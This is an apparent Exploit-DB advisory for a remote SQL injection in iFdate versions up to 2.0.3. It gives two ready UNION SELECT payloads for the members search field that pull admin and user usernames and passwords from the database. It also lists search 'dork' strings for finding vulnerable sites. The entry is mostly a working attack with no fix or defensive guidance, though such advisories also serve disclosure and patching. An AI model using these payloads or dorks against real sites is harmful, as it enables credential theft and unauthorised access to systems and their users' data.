iFdate <= 2.0.3 - Remote SQL Injection Vulnerability

2008-08-26T00:00:00
ID EDB-ID:6315
Type exploitdb
Reporter ~!Dok_tOR!~
Modified 2008-08-26T00:00:00

Description

iFdate <= 2.0.3 Remote SQL Injection Vulnerability. CVE-2008-7114. Webapps exploit for php platform

                                        
                                            iFdate &lt;= 2.0.3 SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 26.08.08
Product: iFdate
Version: 2.0.3
Price: $140
Download script: http://depositfiles.com/ru/files/537317
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

http://localhost/[installdir]/members_search.php

need avtorizovatsya

Search Name/Nickname:

Exploit 1:

' union select 1,concat_ws(0x3a,admin_username,admin_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_admins/*

Exploit 2:

' union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ifdate_users/*

Dork:

  Powered by iFdate v.2.0
iFdate v.2.0
iFdate v.2.0 Copyright

# milw0rm.com [2008-08-26]